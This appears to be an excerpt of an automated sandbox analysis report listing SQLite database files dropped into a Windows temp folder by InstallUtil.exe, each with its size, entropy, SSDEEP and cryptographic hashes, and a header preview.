                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp1240.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp1241.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp1261.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp1262.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp24F6.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp2506.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp2517.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp2527.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp2548.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp2558.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):98304
                                                            Entropy (8bit):0.08235737944063153
                                                            Encrypted:false
                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp49EE.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp49FE.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp4A0F.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp4A20.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp4A40.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp5A83.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):98304
                                                            Entropy (8bit):0.08235737944063153
                                                            Encrypted:false
                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp814F.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp817E.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp819F.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpB87F.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpB88F.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpB8AF.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpB8B0.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
